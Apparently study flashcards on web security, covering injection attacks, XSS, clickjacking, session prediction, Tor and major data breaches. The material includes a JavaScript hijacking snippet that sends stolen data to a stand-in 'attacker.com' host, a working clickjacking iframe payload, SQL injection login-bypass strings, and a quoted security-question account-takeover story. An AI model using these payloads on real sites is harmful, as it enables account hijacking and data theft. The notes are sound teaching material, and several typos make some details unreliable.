Hacking the Web
How does Joe infect websites with malware
Some common ways that websites get infected are: Cross-site scripting attacks (XSS) - most common form of attack since 2008 SQL injection attacks - attacks maliciously alter backend databases of websites thus making them redirect users to malware sites Search Engine result redirection - Easter related search results poisoned redirecting users to malicious software Attacks on backend virtual hosting companies Vulnerabilities in web-server or forum-hosting software (ex. PhPBB - PHP Bulletin Boards vulnerabilities) Using social networking sites to infect users (these are combination of social engineering and above attacks) (ex. MySpace SAMY worm)
Credential/Session Prediction (Session Hijacking)
Credential/Session prediction is a method of hijacking or impersonating a web site user. Typically, web sites associate a unique value called session ID with a user when the authentication is done. The session ID authorizes the users actions on the website. Deducing or guessing the unique value that identifies a particular session or a user is enough to pose as a legitimate user and perform actions on the real users behalf. Many websites use proprietary algorithms to generate session IDs which many not be cryptographically random. Sometimes these IDs are nothing more than a sequential increment or use a combination of variables. The hacker typically launches the attack by reading these session IDs from a cookie, hidden form field or URL and calculates or brute forces subsequent session IDs
Deep Web
.onion TLD not the Internet DNS root or available through DNS servers Tor clients can access sites with .onion addresses by sending the request through network of Tor servers .onion addresses are "registered" automatically by Tor client when a hidden service is set up. names are opaque strings generated from public keys Proxies for non-Tor browsers (such as Tor2web) allow access to hidden services from Chrome and Safari Search engines do not work without a Tor proxy Dark Web: sub-set of Deep Web that consists of Darknet markets and sites about drugs, pornography, weapons, assassins, counterfeit and forgeries and hacking, etc. large section for whistle blowers to come forward and expose people, organizations, and governments for wrong doings. Combining anonymizing VPN + Tor adds an extra layer of encryption and anonymity making it virtually impossible to trace you. Using a good VPN will mean you are sharing an IP with hundreds if not thousands of other so even if Tor was cracked and the real IP found then it would be the VPN IP and they couldn't tell who it is. DarkWebNews aggregates 4700+ Deep Web links and allows searches at https://darkwebnew.com/deep-web-links/ (example: search for "credit card" or "paypal")
Drive by download: The automatic infection vector of 2008
1. Hacker inserts malicious url 2. Web user visits Good Web site 3. Users is re-directed to Bad Web site 4. Badsite sends obfuscated exploit for vulnerability on end user's system 5. Malware installed without User noticing 6. Malware sends private data to Hacker
Anatomy of typical web attack
1. Joe hacks foobar.com and posts malicious stuff (e.g. <scrpt> tags points to malicious JavaScript 2. Alice visits foobar.com as usual 3. Alice is served her regular pages along with the malicious stuff which go and install on her computer Step 3 may install malware fully automatically (often called drive-by-download), or it may require some inputs from Alice (like click on buttons or links)
Weak Passwords
123456 is the most used password. Report considered 2 million network vulnerability scans and examined 300 recent security breach investigations in its assessments. "Password1" is the most common password used by businesses b/c it satisfies Microsoft Active Directory setting (1 UL letter, a number, at least 9 characters) SplashData has been keeping track of password insecurity since 2011
Web Security from Hacker's Perspective
2009 Rates: 12 Verified PayPal Keys - $90 Credit Card w/o CCV2 - $1 - $3 Credit card w/ CCV2 - $1.50 - $10 depending on country Credit Card databases - $100 - $300 Credit Card relative prices: Visa < MasterCard < Discover < AMEX 40 full identities - $200 42 rich bank accounts - $31500 36 US passports - $28800 Spamming Email Service - $0.01 per 1000 emails with 85% reliability of delivery Today's values can be obtained with a fraction of the 2009 prices, incentives for hacking are clear b/c huge market demand
Example code for Clickjacking
<style> iframe { width: 550px; height: 228; // use absolute positioning to line up update button with fake button position: absolute; top: -170px; left: -418px; z-index: 2; // hide from view -moz-opacity: 0; opacity: 0; filter: alpha(opacity=0); } button { position: absolute; top: 10px; left: 10px; z-index: 1; width: 120px; } </style> <iframe src="http://twitter.com/home?status=Test!!" scrolling="no"></iframe><button>Click Here</button>
Zero-day vulnerability
A flaw A zero-day attack happens once that flow or software/hardware vulnerability is exploited and attackers release malware before a developer has an opportunity to create a patch to fix the vulnerability (hence zero day)
PassPhrases
A passphrase is like a password but longer and more secure. It is an encryption key that you memorize. Problem: how do you come up with easy-to-memorize but very secure passphrases? Just thinking of one is incredibly hard, especially if your adversary really is capable of 1 trillion guesses per second. Using an entirely random sequence of characters it might be very secure, but it's also agonizing to memorize. Solution: Use Diceware. Shakespeare quotes are not good passphrases because they lack something called entropy (randomness). Diceware is based on a word list which contains 7776 English words (37 pages printed). Roll a dice 5 times to select one word at a time for your passphrase. Roll a dice 5 times and select one word at a time for your passphrase. If you are worreid about the NSA, come up with a 7-word passphrase (1/1,719,070,799,748,422,591,028,658,176 chance that an attacker will pick your passphrase each try). At 1 trillion guesses/second (per Edward Snowden's Jan 2013) warning it would take 27 million years to guess this passphrase. (ex bolt vat frisky fob land hazy rigid) Recommendation: use a password database (KeePassX) locked up with master diceware passphrase In Aug 2017, original author of NIST password guidelines Bill Burr regreets making error of recommending passwords with uppercase/lowercase/letters/numbers/obscure characters/min of 8 characters
Russian Hacking of US Election
A report by US intelligence concluded that President Vladimir V. Putin of Russia ordered an effort to disrupt the 2016 election including cyberattacks on the email accounts of the Democratic Party officials. American intelligence officials have said they believed that the hackers were associated with two Russian intelligence agencies: Federal Security Service FSB (Jul 2015: hacking group possibly linked to the agency, the main successor to the KGB entered the DNC servers undetected for nearly a year. Nicknamed Cozy Bear, the Dukes or A.P.T. 29 for advanced persistent threat) and GRU: Military Intelligence (Mar 2016 GRU/Fancy Bear or APT 28 was second group to break into DNC). Leakers: Guccifer 2.0 (self-proclaimed hacker that investigators say was a persona created by the GRU, published documents itself and leaked a series of DNC documents), DCLeaks.com (front for Russian hackers who tried to disrupt election, appeared in June as release the stolen Democratic Party documents began). Publishers: Wikileaks (report released Jan 6 said that intelligence officials assess with high confidence that GRU relayed material acquired from the DNC and senior Democratic officials to WikiLeaks. Website released over 58,000 emails from DNC's computer servers. Indictments: In Jul 2018, US Justice Dept announced indictments of 12 member of GRU
Cross-Site Scripting (XSS)
A type of computer security vulnerability typically found in Web applications. Due to breaches of browser security, XSS enables attackers to inject client-side script into Web pages viewed by other users. A cross-site scripting vulnerability may be used by attackers to bypass access controls such as the same origin policy. Originally XSS referred to the act of loading the attacked, 3rd party web application from an unrelated attack site, in a manner that executes a fragment of JavaScript prepared by the attacker. The definition gradually expanded to encompass other modes of code injection, including persistent and non-JavaScript vectors (including Java, ActiveX, VBScript, Flash, or even pure HTML, and SQL Queries). There are two types of XSS attacks: the non-persistent or reflected cross-site scripting vulnerability is by far the most common type (when the data provided by a web client, most commonly in HTTP query parameters or in HTML form submissions is used immediately by server-side scripts to parse and display a page of results for and to that user, without properly sanitizing the request), the persistent or stored XSS occurs when the data provided by the attacker is saved by the server and then permanently displayed on normal pages returned to other users in the course of regular browsing
Look at current state of web security
According to WhiteHat Website Security Statistics Report (2013-4): 86% of all websites have at least one of the SERIOUS vulnerabilities, average number of open SERIOUS vulnerabilities per website was 56 (unfixed)< Cross-site scripting (XSS) is #1 vulnerability, PHP apps have highest risk of exposing vulnerabilities According to Symantec Internet Security Threat Report From 2002-7, Symantec created 800,000 unique malware signatures. In 2008 alone, Symantec created 1.8M - a 239% increase. In 2012, 1 in 100 emails contained a virus. In 2013, 67% of compromised websites were legitimate. In 2014, 5 out of 6 large companies have been attacked (40% increase year over year) and 24 or zero vulnerability days discovered. A new Zero-Day Vulnerability was discovered on average each week in 2015. Over Half a billion personal records were stolen in 2015. Ransomware increased 35% in 2015. Symantec blocked 100M Fake technical support scams in 2015 (cold calling).l Major security vulnerabilities in three quarters (3/4) of popular websites put US all at risk
TOR Development
Alpha version of Tor developed by Syverson and computer scientists Roger Dingledine and Nick Nathewson, called the Onion Routing project, or Tor project, launched on 20 September 2002. In 2004, the Naval Research Laboratory released the code for Tor under a free license and the Electronic Frontier Foundation (EFF) began funding Dingledine and Mathewson to continue its development. The EFF acted as the Tor Project's fiscal sponsor in its early years, and early financial supporters of The Tor Project included the US International Broadcasting Bureau, Internews, Human Rights Watch, the University of Cambridge, Google, and Netherlands-based Stichting NLnet. The Tor Project states that Tor users include "normal people" who which to keep their Internet activities private from websites and advertisers, people concerned about cyber-spying, users who are evading censorship such as activists, journalists, and military professionals. As of Nov 2013, Tor had about 4 million users.
JavaScript Hijacking
An attack against the transport mechanism used by many rich Web applications. Allows an unauthorized attacker to read confidential data from a vulnerable application using a technique similar to the one commonly used to create mashups. This technique builds on CSRF (Cross site request forgery). Web browsers enforce the Same Origin Policy in order to protect users from malicious websites. JavaScript Hijacking allows an attacker to bypass the Same Origin Policy in the case that a web application uses JavaScript to communicate confidential information. Any data transport format where messages can be interpreted as one or more valid JavaScript statements is vulnerable to JavaScript Hijacking. JSOn makes JavaScript Hijacking easier by the fact that a JSON array stands on its own as a valid JavaScript statement. Since arrays are a natural form for communicating lists, they are commonly used wherever an application needs to communicate multiple values. Put another way, a JSON array is directly vulnerable to JavaScript Hijacking. The attack is possible because web browsers don't protect JavaScript the same way they protect HTML; if a web application transfers confidential data using messages written in JavaScript, in some cases the messages can be read by an attacker.
Brute Force Attacks
An automated process of trial and error used to guess a person's username, password, session ids, credit-card, cryptographic key or anything that is unique to the user and authenticates him 2 types: Normal (uses a single username against many passwords), Reverse (uses many usernames against a single password--in a system with millions of accounts, the odds of finding two users with same password increases) Easy when websites don't implement any form of account lockout policy
Credential/Session Prediction Example
Attack on 123greetings.com 123greetings.com used to send users URLs like http://123greetings.com/view/AD307525122110120 where URLs generated within a short time had numbers next to each other. It turns out the "so-called" random number at the end of the URL string had the following format: AD3 was the constant 07251221 is the date/time at which the URL was sent (25 July 12:21 PST) so only left with 5 digits of randomness out of 16 digits. Implications: With a fairly simple script and some knowledge of time and data one can easily brute force a bunch of URLs and view greetings which are not meant to be viewed by him!
JavaScript Hijacking Example
Attacker can mimic the client and gain access to confidential data the server returns: Client requests data from a server and evaluates the result as JSON the following code: var object; var req = new XMLHttpRequest(); req.open("GET", "/object.json", true); req.onreadystatechange = function ( ) { if (req.readyState == 4) { var txt = req.responseText; object = eval("(" + txt + ")"); req = null; } }; req.send(null); Server responds with an array in the JSON format: [{"fname":"Brian", "lname":"Chess", "phone":"6502135600", "purchases":60000.00, "email":"[email protected]" }, {"fname":"Katrina", "lname":"O'Neil", "phone":"6502135600", "purchases":120000.00, "email":"[email protected]" }] Other users cannot access this info without knowing the user's session identifier (stored as cookie). However, if a victim visits a malicious site can retrieve the info using JavaScript Hijacking. If a victim can be tricked into visiting a Web page that contains the following malicious code, the victim's lead information will be sent to the attacker's Web site. <scrpt> function Object() { //override constructor to create objects this.email setter = captureObject; } function captureObject(x) { var objString = ""; for (fld in this { objString += fld + ": " + this[fld] + ","; } objString += "email: " + x; var req = new XMLHttpRequest(); req.open("GET", "http://attacker.com?obj=" + escape(objString), true); req.send(null); } </scrpt> <scrpt src="http://www.example.com/object.json"></scrpt>
Search Worms
Automate finding of vulnerable web servers by sending carefully crafted queries to search engines. Such worms spread by using popular search engines to find new attack vectors. Note that this eliminates the need for worms to randomly scan hosts in the network to find targets. This also helps them evade common detection methods. These worms not only put significant load on search engines, they also evade detection mechanisms that assume random scanning. Search Worms work as follows: Generate Search Query, Analyze Search Results, Infect Identified Targets
TOR Operations
Because the IP Address of sender and recipient are not both in cleartext at any hop along the way, anyone eavesdropping at any point along the communication channel cannot directly identify both ends. Tor can also provide anonymity to websites and other servers. Servers configured to receive inbound connections only through Tor are called hidden services. Rather than revealing a server's IP address (and thus its network location), a hidden service is accessed through its onion address (.onion) usually via Tor Browser
SQL Injection Example
Consider the following SQL code in the backend for authenticating users: SQLQuery = "SELECT Username FROM Users WHERE Username = '" & strUsername & "' AND Password = '" & strPasswrod & " '" strAuthCheck = GetQueryResult(SQLQuery); Suppose an attacker submits a login and password that looks like the following: Login: ' OR "=' Password: ' OR "=' This will cause the resulting SQL query to become SELECT Username FROM Users WHERE Username = " OR "=" AND Password = " OR "='' Instead of comparing the user-supplied data with entries in the Users table, the query compares " (empty string) to " (empty string). This will result in True result and the attacker will then be logged in as the first user in the Users table.
Attack prevalence by class (2012)
Cross site scripting: 43% Content spoofing: 13% Other: 12% Information Leakage: 11% Cross-Site Request forgery: 7% Brute Force Insufficient Transport Layer Protection Insufficient Authorization SQL Injection Data greatly differs from TOP 15: one website may posses hundreds of unique issues of a specific class, another may not contain any
Median days vulnerability class 2014
Cross-Site Scripting: PHP (100-200) < ColdFusion < Java < .NET < ASP < Perl (200-300) Information Leakage: ColdFusion < PHP < Java (100-200) < .NET < Perl (200-300) < ASP (300-400) Content Spoofing: PHP (100) < Perl < ColdFusion (100-200) < .NET < Java < ASP (200-300) SQL Injection: Perl < PHP (0-100) < Java < .NET (100-200) < ASP < ColdFusion (200-300) Cross-Site Request Forgery: Perl (0-100) < PHP < ColdFusion (100-200) < .NET < Java < ASP (200-300) Insufficient Transport Layer Protection: Java < .NET < ColdFusion = ASP < Perl (0-100) < PHP (100-200)
TOR
Directs Internet traffic through a free, worldwide, volunteer overlay network consisting of more than 7000 relays to conceal a user's location and usage from anyone conducting network surveillance or traffic analysis. Onion routing is implemented by encryption in the application layer of a communication protocol stack, nested like the layers of an onion. Tor encrypts the data, including the next node destination IP address, multiple times and sends it through a virtual circuit comprising successive, random-selection Tor relays. The core principle of Tor "onion routing" was developed in mid-1990s by US Naval Research Laboratory employees, mathematician Paul Syverson, and computer scientists Michael G. Read and David Goldschlag, with the purpose of protecting US intelligence communications online. Onion routing was further developed by DARPA in 1997
Email Hacks
DomainKeys Identified Mail (DKIM) Spoofing DKIM is a method of associating a domain name to an email message, thereby allowing a person or organization to claim responsibility for a message. Association is set up by digital signature validated by recipient. Responsibility is claimed by a signer by adding a DKIM-signature header. The verifier obtains signer's public key using DNS, and verifies the signature matches the message content. DKIM is implemented by Yahoo/Gmail/AOL email providers. Any email from these providers should carry the DKIM signature. DKIM can be used as anti-phishing technology. Gmail utilizes DKIM so that any email from eBay (ebay.com) and Paypal (paypal.com) will not be accepted if it cannot be verified with DKIM. In Oct 2012 Wired reported that mathematician Zach Harris detected and demonstrated an email source vulnerability with short DKIM keys. Authentication with 384 bit keys could be factored in 24 hours on his laptop and 512 bit keys could be factored in 72 hours with cloud computing resources. Google confirmed beginning to use longer keys after this disclosure.
Cambridge Analytica
Dr. Aleksandr Kogan of Cambridge University and Global Science Research (GSR): data was collected through an app called thisisyourdigitallife, built by Kogan. Hundreds of thousands of users were paid to take a personality test and agreed to have their data collected for academic use. The app also collected the info of the test-taker's Facebook friends. SCL Elections, Cambridge Analytica's parent company signed with GSR, Kogan's company for the work. CA data harvesting apps captured more than 87 million Facebook profiles. Facebook knew in Dec 2015 that data had been harvested on CA's behalf. In Aug 2016, Facebook lawyers sent letter to Christopher Wylie of CA to ask him to delete the unauthorized data. Data wasn't deleted by CA. CA worked with Donald Trump's election team to build a powerful software program to predict and influence choices at the ballot box, a system that could profile individual US voters, in order to target them with personalized political advertisements. In Jan 2018: Christopher Wylie became a "whistleblower": Wylie told British authorities that the app was used to harvest data for CA was likely to have pulled the profiles of British Facebook users. It was only when Wylie came forward with documents--signed contracts and invoices--that proved CA had funded the harvesting of Facebook profiles that Facebook was finally forced to own up
The NSA
Edward Snowden disclosures Jun 2013: Edward Snowden decided he wanted to start a debate about mass surveillance by the US National Security Agency (NSA). Still witnessing the release of the material he took with him while he was contractor working for the NSA. Among the tools used by the NSA for mass surveillance are: Cable intercepted programs monitoring traffic flowing into and across the US (BLARNEY, FAIRVIEW, OAKSTAR and STORMBREW aka Upstream collection) Data collect programs from Google, Facebook, Apple, yahoo, and other US internet giants (PRISM aka Downstream collection) Snowden documents reveal that the NSA has successfully broken or circumvented much of online encryption, including TLS/SSL, HTTPS, SSH, VPNs (Project BULLRUN)
Browser and Plugin Vulnerabilities Example
Firefox bug affecting FF 3.0.0 - Crash with malformed GIP file on Mac OS X. This is a vulnerability in Mozilla graphics code which handles GIF rendering in Mac OS X. A GIF file could be specially crafted to cause the browser to free an uninitialized pointer. An attacker could use this vulnerability to crash the browser and potentially execute arbitrary code on the victim's computer.
Cyberspace Security Alert Status
Go to http://thorton.info/tools/inetsecstat.html Includes links to Internet Storm Center, Homeland Security, Symantec ThreadCon, ISS AlertCon, CA Security Advisor, World Port Scan Map, Virus Radar, McAffee Threads, Norman Virus Warnings Brings together a list of security websites dealing current threads on the Internet
Insufficient Authentication
Happens when a website allows users to access sensitive content or functionality without proper authentication Many websites "hide resources" by not linking the location into the main websites (security through obscurity) For example, many times web servers have /admin directory which is not linked to the main website but if not properly configured for permissions a user can view the contents by typing in the right URLs Referred in OWASP Top 10 of 2007 as "Failure to restrict URL access."
Yahoo Breach
In Jul 2012, Yahoo confirmed that 400,000 usernames and passwords had been stolen. Compromised Yahoo accounts belonged to Yahoo's Contributor Network, an online platform to share video, audio and slide shows, also known as Yahoo Voices. A group of hackers, known as D33D Company, psted the names and passwords of 453,492 accounts belonging to yahoo, 106,000 Gmail, 25,000 AOL, 55,000 Hotmail, and 6 other providers. The breach was the result of a "union-based SQLK injection" attack as reported by D33D
Linkedin Breach
In Jun 2012, Linkedin announced hackers stole more than 6 million customer passwords, which had been only lightly encrypted. A Russian hacker claimed he stole the 6,458,000 encrypted passwords (cryptographic hashes) and posted them online without username to prove his feat. LinkedIn apparently did not "salt" (use random bits) their password file, but instead used a single iteration of SHA-1
Massive JP Morgan Chase Hack
In Nov 2015, 4 men were indicted on charges they hacked into multiple financial institutions. Hackers operated a stock-pumping scheme and online gambling operations that netted them more than 100 million dollars. Operation ran from 2012-2015. FBI says defendants hacked into JP Morgan Chase and obtained access to 80 million customer accounts. Charges include unauthorized access of computers, identity theft, securities, and wire fraud and money laundering. In addition to breaching JP Morgan Chase, they are charged with hacking into six other financial institutions, as well as financial news sites, online stock brokers and even software companies, including Dow Jones, Scottrade, and ETrade. An unindentified hacker used multiple methods to break into the networks, including brute force attacks. To hide their activities they set up dozens of shell companies and used fake passports and other fraudulent credentials to maintain false identities.
iCloud Celebrity Photos Breach
In Sept 2014, hundreds of celebrity accounts were compromised by a very targeted attack on user names, passwords, and security questions. Photos of celebrities were downloaded and posted online. To protect against this type of attack, Apple advised all users to always use a strong password and enable two-step verification. Apple changed iCloud login as follows: anytime someone logs in to iCloud from new machine/browser, an email is sent to account holder
Injection Attacks
Injection attacks occurs when an application does not properly validate user supplied input and then includes that input blindly in further processing. SQL/LDAP/XPATH/SOAP/JSON Injection are all types of Injection Attacks that are enabled by improper input validation. When an attacker is able to craft a malicious input, the process will run with the same permissions as the component that executed the command (e.g. Database server, web application server, web server, etc.) This can cause serious security problems where the permissions grant the rights to add, query, modify, and remove anything.
Anonymous
International cabal of criminal hackers dating back to 2003 who have shut down the websites of the US department of justice and the FBI they have hacked into the phone lines of Scotland Yard. Responsible for attacks against MasterCard, Visa, Sony, and Governments of US, UK, Turkey, Australia, Egypt, Algeria, Libya, Iran, Chile, Colombia, New Zealand, and Canadian MP Marc Gameau Recently hacked nazi-site Daily Stormer
Bypassing the Same-Origin policy
JSON and the dynamic SCRIPT tag JSON with Padding (JSONP) is a way to bypass the same-origin policy by using JSON in combination with the <scrpt> tag. <scrpt type="text/javascript" src="http://travel.com/findItinerary?username=sachiko& reservationNum=1234&output=json&callback=showItinerary" /> When JavaScript code dynamically inserts the <scrpt> tag, the browser accesses the URL in the src attribute. This results in sending the information in the query string to the server. In the above example, the username and reservationNum are passed as name-value pairs. In addition, the query string contains the output format requested to the server and the name of the callback function (that is, showItinerary). In this case, the URL returns a JSONP string which is a JSON string wrapped by the callback function. When the <scrpt> tag loads, the function executes, and the info returned from the server passes to it thru its arguments
Account Breaches
Linkedin Yahoo Target Heartbleed Adobe Security iCloud Celebrity Photos Massive JP Morgan Chase Equifax
Browser and Plugin Vulnerabilities
Loosely defined, these vulnerabilities in the client browser software or client plugins (Flash/Macromedia/Acrobat etc.) that can either enable other attacks, can enable execution of arbitrary code, raise privileges, compromise users privacy, or simply crash the browser. These are specific to the particular make and version of software like Mozilla, IE etc. and cannot be generalized. These vulnerabilities have to be patched by the vendors and the web application developers cannot do much about these except be aware of the issues. Fortunately, Flash has been replaced by HTML5 video and will soon be retired.
Clickjacking
Method used by malicious individuals to trick users into clicking something without them knowing what they've clicked. Idea is simple: An iframe is positioned above what looks like a clickable button on a website. The iframe is invisible to user (opacity: 0) and so user unknowingly clicks on the iframe which may contain anything! This can be achieved through CSS alone (no JavaScript required). A variation of this technique involves the use of JavaScript to move the iframe around the screen inline with the user's cursor, therefore achieving the same thing but without having to convince the user to click on the button. The original concern was related to Flash and how a user could unknowingly enable their webcam and microphone so that the attacker would have access. Clickjacking is hard to combat. From a technical standpoint, the attack is executed using a combination of CSS and iFrames, which are both harmless web technologies, and relies mostly on tricking users by means on social engineering
Search Work Examples
MyDoom.O (Jul 2004): MyDoom was a worm that propagated via email. The email claims to be from a company's support department and contains an executable file as an attachment. When a user executes it, the worm gets activated and searches the local hard disk for email addresses of other users to infect. As a result, the worm propagates along the social network of the infected users. MyDoom.O uses the domain names of email addresses to search for more email addresses on Internet search engines. It first started spreading Jul 26, 2004 and managed to infect about 60,000 hosts in less than 8 hours. MyDoom.O uses following search engines weighted by their respective probabilities: Google (45%), Lycos (22.5%), Yahoo (20%), Altavista (12.5%) Santy (Dec 2004): It was the first search worm to propagate automatically without any human intervention. It is written in Perl and exploits a bug in the phpBB bulletin system that allows an adversary to run arbitrary code on the web server. To find vulnerable servers to infect, it uses Google to search for URLs that contain the string viewtopic.php. To infect a web server, Santy appends an exploit against phpBB2 to each URL extracted from the search results. The exploit instructs the web server to download the Santy worm from a central distribution site.
Two types of SQL injection
Normal SQL Injection: In this form of SQL injection, the attacker is guided by the SQL error messages that the server returns and keeps modifying his queries till the server is satisfied Blind SQL Injection: In Blind SQL Injection, instead of returning a database error, the server returns a customer-friendly error page informing the user that a mistake has been made. In this instance, SQL injection is still possible but not as easy to detect. A common way to detect Blind SQL injection is to put a false and true statement into the parameter value. Executing the following request to a website http://example/article.asp?ID=2+and+1=1 should return same page as http://example/article.asp?ID=2 because the SQL statement 'and 1=1' is always true. Executing the following request to a web site http://example/article.asp?ID=2+and+1=0 would then cause the web site to return a friendly error or no page at all. This is because the SQL statement 'and 1=0' is always false. Once the attacker discovers that a site is susceptible to Blind SQL Injection, he can exploit further.
Adobe Security Breach
Oct 2013: 150 million account credentials exposed by Adobe, leading to secondary breaches all over the Internet. More than 150 million user IDs with hashed (encrypted) passwords were stolen, including at least 38 million active users. Attackers with the Adobe list compromised other web applications, stealing user identities, and even credit information. In fact, major sites like Facebook saw the risk and advised their users to update their password. To protect against this type of attack, passwords should not be re-used across sites
Target Breach
On Dec 18 2013, security expert Brian Krebs said Target was investigating major data breach potentially involving millions of customers credit/debit card records. Target confirmed hack took place between Nov 27 - Dec 15, 2013. Target disclosed that up to 40 million consumer credit/debit cards may have been compromised: hackers gained access to customer names, card numbers, expiration dates, CVV codes, and PIN data. On Jan 14, 2014, target disclosed that also names, addresses, phone numbers, and email addresses had been stolen for up to 110 million customers. Target had been notified of a possible breach by the FireEye security service but did not act to prevent the theft from being carried out. A 17 year old Russian teen was suspected to be the author of BlackPOS which was used by others to attack the Windows computers used by Target. Another 23 year old Russian Rinat Shabayev claimed to be malware author. Target breach is largest/most lucrative breach that has happened to date.
Distributed Denial-of-Service (DDos) Attacks
On Oct 21, 2016 New Hampshire based Dyn said its server infrastructure suffered a distributed denial-of-service (DDoS) attack, which occurs when a system is overwhelmed by malicious electronic traffic. The scale of the attack led to suspicions that might be state sponsored but ZDNet security editor Zack Whittaker said the evidence is not yet clear. The attack on Dyn DNS was powered in part by botnet of hacked DVRs and webcams known as Mirai. The source code for the malware that controls this botnet was put on Github.
Equifax Breach
On Sep 7 2017, Equifax reported having a data break affecting 143 million US consumer credit accounts. Stolen data includes SSNs, birth dates, addresses, and driver's license numbers. Equifax is one of the big three credit-reporting firms in the US and maintains credit reports on more than 200 million US adults. The four pieces of info exposed in the attack are generally needed for consumes to apply for many forms of consumer credit, including credit cards and personal loans. That means that swindlers who have access to this data could have an easier time getting approved for credit in other people's names and potentially makes it more difficult for lenders to spot a problem
What damage can Joe's hacks cause
On client machine: stealing users cookies and thus gaining access to users accounts on websites like email/banking, logging users keystrokes, showing defaced/altered websites to the user (phishing), user credential stealing and misuse, stealing browser history and compromising privacy of user, evading or disabling phishing filters and thus opening up new avenues for attacks, circumvent other security controls like bypassing HTTPS, installing malicious software (like Trojans/Rootkits), spamming On server: defacing pages, altering content, injecting malicious content in dynamically served pages and thus infecting all users who visit the site, denial of service on the server resulting in downtime and hence loss of business, phishing, scanning intranet for vulnerable machines, spamming
Weak Password Recovery Example
Paris Hilton T-Mobile account hacked (2005): A group of hackers hacked into Hilton's T-Mobile Sidekick account and posted contents from her email inbox all over the internet. While the hack used a combination of social engineering tricks and technical flaws, the hack was finally successful because the hackers were able to reset Hilton's password. Like many online service providers, T-mobile required users to answer a "secret question" if they forget their passwords. For Hilton's account, the secret question "What is your favorite pet's name?" and you just have to Google the answer Sarah Palin's email account hack (2008): In the past couple days news had come to light about palin using a yahoo mail account, [..] after the password recovery was reenabled, it took 45 min on wikipedia to find birthday and 15 seconds for zip code. The "where did you meet your spouse" question required research but apparently she had eloped with Mr. Palin after college and there are pictures in Google if you search "palin eloped". More research suggested that they met at high school, so I did variations of that, high/high school/Wasilla high and changed the password to popcorn
Top 15 Attacks 2012
Percentage likelihood that at least one serious vulnerability will appear in website 1. Information Leakage (55%) 2. Cross-site scripting (53%) 3. Content spoofing (33%) 4. Brute force (26%) 5. Cross Site Request Forgery (26%) 6. Fingerprinting (23%) 7. Insufficient Transport Layer Protection (22%) 8. Session Fixation (14%) 9. URL Redirector Abuse (13%) 10. Insufficient authorization (11%) 11. Directory indexing (11%) 12. Abuse of functionality (9%) 13. Predictable resource location (8%) 14. SQL Injection (7%) 15. HTTP Response Splitting (4%)
How "poor Alice" gets infected
Poor alice can get the malware planted by Joe in many ways: By installing "fake codecs" embedded with Trojans (Ex. xlob Trojan). By viewing "malicious advertisements" (ex. Flash Banner ads as seen in 2008). By installing "fake scanners" or "misleading applications" (also called scareware/rogueware). (ex. Some malware trick users into believing that their computer is infected and urges them to install software like "antivirus 2009" which itself is a malware.) By visiting malicious P2P sites and downloading malicious content By visiting websites sent as email links by the hacker (also form of "social engineering attack") By visiting links posted on "Blog Sites" under "Block Comments" (Blog spam is very common and many unsuspecting fall prey to links posted by malicious individuals posting as honest opinionates) By installing pirated software from warez sites which are maliciously modified by hackers
PGP & S/MIME
Pretty Good Privacy (PGP) is data encryption technology commonly used for encrypting files, especially emails. S/MIME is a standard for public encryption and signing of MIME data in emails 1. Sending the document: PGP depends on users having 2 keys - one public and one private. These two keys can only be used with one another 2. Encrypting the document: The sender users a random session key to encrypt the file. They sign the message with their private key, and encrypt the key using the receiver's public key. 3. An encrypted file: The file and the key are sent to the receiver, PGP, unlike TOR, does not anonymize the sender, but does provide strong encryption for the file 4. Decrypting the document: The receiver verifies the signature with the sender's public key, and decrypts the key with their private key. They then decrypt the file using the key 5. Message delivered: The receiver could then reciprocate the process using the sender's public and private keys
Cross Site Scripting (XSS) Reducing the Threat
Primary defense mechanism to stop XSS is contextual output encoding/escaping. There are several different escaping schemes that must be used depending on where the un-trusted string needs to be placed within an HTML document including HTML entity encoding, JavaScript escaping, CSS escaping, and URL (or percent encoding). Most web applications that do not need to accept rich data can use escaping to largely eliminate the risk of XSS in a faily straightforward manner. Many web applications rely on session cookies for authentication between individual HTTP requests, and because client-side scripts generally have access to these cookies, simple XSS exploits can steal these cookies. To mitigate this particular threat many web applications tie session cookies to the IP address of the user who originally logged in, and only permit that IP to use that cookie. Another mitigation present in IE, Firefox, Safari, Opera, and Chrome is an HttpOnly flag which allows a web server to set a cookie that is unavailable to client side scripts. Some web applications are written to (sometimes optionally) operate completely without the need for client-side scripts. This allows users, if they choose, to disable scripting in their browsers before using the application. In this way, even potentially malicious client-side scripts could be inserted unescaped on a page, and users would not be susceptible to XSS attacks.
Heartbleed Bug
Serious vulnerability in the popular, open-source, OpenSSL cryptographic software library. This weakness allows stealing the info protected by SSL/TLS encryption. Allows anypone on the Internet to read the memory of systems protected by the vulnerable version of OpenSSL. Bug called "heatbleed" because it is a bug in the implementation of the TSL/DTLS "heartbeat" extension (RCF 6520). The Heartbeat Extension provides a new protocol for TLS/DTSL allowing the usage of keep-alive functionality without performing a renegotiation. Versions of OpenSSL 1.0.1 (introduced in Dec 2011) through 1.01f are vulnerable. OpenSSL version 1.0.1g released on Apr 7, 2014 fixes the bug. Open source web servers like Apache and nginx are affected as many implementations use OpenSSL for SSL/TLS transactions. Versions of Linux (Debian, Ubuntu, CentOS, Fedora, SUSE) are affected, as well as FreeBSD and OpenBSD. Apple Mac OS X and iOS are not affected as they do not use OpenSSL. End users are encouraged to do all of the following: Change passwords and turn on two-step verification (if available), be wary of public Wi-Fi networks, monitor recent account activity
Worms
Stuxnet A highly sophisticated computer worm. Discovered in 2010, initially spread w/ Microsoft Windows. Targets Siemens industrial software and equipment. First discovered malware that spies and subverts industrial systems. First to include Programmable Logic Controller (PLC) rootkit. Different variants of Stuxnet targeted five Iranian Organizations, with the intended target to be the uranium enrichment infrastructure in Iran (i.e. Iran's nuclear program). Symantec noted that 60% of the infected computers worldwide were located in Iran. Stuxnet destroyed up to 1000 centrifuges (10% of Natanz nuclear facility centrifuges) by having them change the rotor speed with the intention of introduction vibrations would destroy the centrifuges. It also speculated that the US and/or Israel were behind such cyber attack. Document movie "Zero Days" details story of the worm and related actors.
TOR: The Web
Surface Web - where the vast majority of people spend their internet time. All is public, all is searchable, and all is mostly friendly (ex. Google, CNN, Amazon) Deep Web - can only be accessed by individuals who have logins for the websites. Most of the activity is perfectly legal. Ex: NASA, US National Oceanic and Atmospheric Administration, US Patent office and private databases like LexisNexis and Westlaw. Search engines can't find these pages Dark Web - part of the deep web that is accessible only to those who use software called TOR which stands for The Onion Router
TOR network architecture
